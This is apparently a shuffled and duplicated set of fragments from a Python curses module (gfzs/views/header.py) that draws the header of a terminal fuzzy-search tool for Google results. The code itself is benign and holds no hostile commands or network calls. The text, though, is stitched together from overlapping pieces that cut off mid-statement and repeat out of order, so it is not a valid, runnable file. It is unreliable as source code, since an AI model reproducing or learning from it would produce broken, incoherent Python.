= str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end", "# Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1,", "finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\" % progname, new_line=True)", "0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"],", "if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c,", "\"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" %", "first_o = True for i in range(len(google)): c = google[i] if c ==", "utils.debug as debug # need when 「cat fixtures/rust.json | python -m gfzs」 #", "run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\")", "as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\"", "__name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the", "self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout()", "def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout()", "except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import", "a window object representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init()", "https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google = list(GOOGLE) first_o", "application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while", "<gh_stars>0 import curses import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH", "1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1", "bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as", "= \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": #", "info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase()", "if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local", "import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when", "\"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect", "window object representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() #", "= None try: target.run() except curses.error as e: error = str(e) finally: target._end_curses()", "% progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint)", "color.init() # turn off automatic echoing of keys to the screen curses.noecho() #", "gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as", "debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" %", "local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import", "gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info", "sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import utils.color as color", "curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except curses.error as e:", "from model import Model import runtime.config as runtime_config import utils.color as color progname", "to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the", "need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base", "user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local #", "color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties)", "c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE)", "Model import runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties", "\"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True:", "create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header()", "as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"}", "gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug", "base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat", "+ 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width -", "as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug #", "self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index", "%s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing", "# need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from", "except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__", "print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object", "+= len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0,", "Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search", "i in range(len(google)): c = google[i] if c == \"o\": if first_o: first_o", "self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self):", "self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if", "len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if", "is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" %", "invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error)", "self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0,", "curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self):", "debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info", "logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except", "GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when", "Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target =", "curses import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\"", "as debug # need when 「cat fixtures/rust.json | python -m gfzs」 # need", "if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates", "error = None try: target.run() except curses.error as e: error = str(e) finally:", "self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version())", "logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print]", "# https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google = list(GOOGLE)", "verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright", "import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try:", "start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index,", "in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns", "reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window =", "else: from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as logger", "== \"o\": if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0,", "False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i,", "sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"):", "TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader]", "\"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/", "# https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import utils.color", "+ 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) +", "keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable", "# need when 「cat fixtures/rust.json | python -m gfzs」 # need when 「cat", "# local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config", "== \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model", "stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def", "'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\"", "utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version =", "Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion", "import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/", "gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"):", "# need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import", "info import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug", "# Write Google google = list(GOOGLE) first_o = True for i in range(len(google)):", "initscr() returns a window object representing the entire screen. logger.debug(\"init curses\") stdscr =", "-m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import", "super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self):", "info from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug", "= str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\" %", "ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger as", "= TestHeader(stdscr) error = None try: target.run() except curses.error as e: error =", "Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright", "utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug", "self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0)", "progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame):", "curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None", "import curses import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH =", "os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\")", "runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\":", "runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error", "= curses.initscr() color.init() # turn off automatic echoing of keys to the screen", "SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config", "start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(),", "utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\":", "self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self):", "from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when", "not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors:", "_loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt:", "self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) +", "self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline(", "== \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base", "curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input =", "import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as", "for i in range(len(google)): c = google[i] if c == \"o\": if first_o:", "https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as runtime_config import utils.color as", "self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy())", "「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base", "c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY,", "list(GOOGLE) first_o = True for i in range(len(google)): c = google[i] if c", "https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger as logger if", "properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname)", "== \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses", "while True: try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break if", "def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width =", "logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing the entire screen.", "curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__ ==", "= \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header()", "as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname,", "info from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug", "curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch()", "self.create() while True: try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break", "as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import", "self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header]", "== curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/", "self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def", "fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else:", "# Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) #", "Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write", "error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr()", "\"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ ==", "= True for i in range(len(google)): c = google[i] if c == \"o\":", "fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base import", "print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit", "True for i in range(len(google)): c = google[i] if c == \"o\": if", "the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse", "the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except", "Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base):", "1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header):", "progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init()", "screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor.", "def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end", "curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))", "need when 「cat fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json", "info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self):", "\"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」", "self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0,", "import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json", "None try: target.run() except curses.error as e: error = str(e) finally: target._end_curses() if", "cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except curses.error as", "self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0,", "when 「cat fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json |", "self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ ==", "if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json | python", "1\") sys.exit(1) # initscr() returns a window object representing the entire screen. logger.debug(\"init", "「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base", "if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError:", "= self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index", "0 # Write Google google = list(GOOGLE) first_o = True for i in", "except curses.error as e: error = str(e) finally: target._end_curses() if error != None:", "import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class", "= \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\"", "FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if", "import info import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"): import", "\"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh()", "python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs", "from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as", "SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\":", "= {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def", "stdscr = curses.initscr() color.init() # turn off automatic echoing of keys to the", "the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self):", "need when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base", "self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE |", "FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH,", "# Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) #", "self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__", "signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\")", "Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write", "self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search())", "import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def", "google = list(GOOGLE) first_o = True for i in range(len(google)): c = google[i]", "self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0,", "self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class", "try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input ==", "c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) #", "c == \"o\": if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else:", "| python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」 else: from", "「cat fixtures/rust.json | python -m gfzs」 # need when 「cat fixtures/rust.json | bin/gfzs」", "= google[i] if c == \"o\": if first_o: first_o = False self.window.addstr(0, i,", "def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright =", "handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not", "progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start", "when 「cat fixtures/rust.json | bin/gfzs」 else: from gfzs import info from gfzs.views.base import", "utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self,", "1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright),", "self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self):", "def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) #", "if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in", "sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import Base if os.environ.get(\"DEBUG\"):", "break if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal #", "KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal", "gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\"))))", "| bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger", "range(len(google)): c = google[i] if c == \"o\": if first_o: first_o = False", "if c == \"o\": if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\"))", "in range(len(google)): c = google[i] if c == \"o\": if first_o: first_o =", "start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index", "off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr)", "0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google =", "def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if", "% info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def", "\"o\": if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i,", "https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import Base if", "object representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn", "create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def", "logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0)", "Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE", "# Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target", "curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing of keys to", "= \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__", "self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch() except", "self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright,", "\"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin()", "curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0)", "echoing of keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak()", "= list(GOOGLE) first_o = True for i in range(len(google)): c = google[i] if", "when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import", "i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index +=", "import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config", "import info from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import", "self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width", "returns a window object representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr()", "def 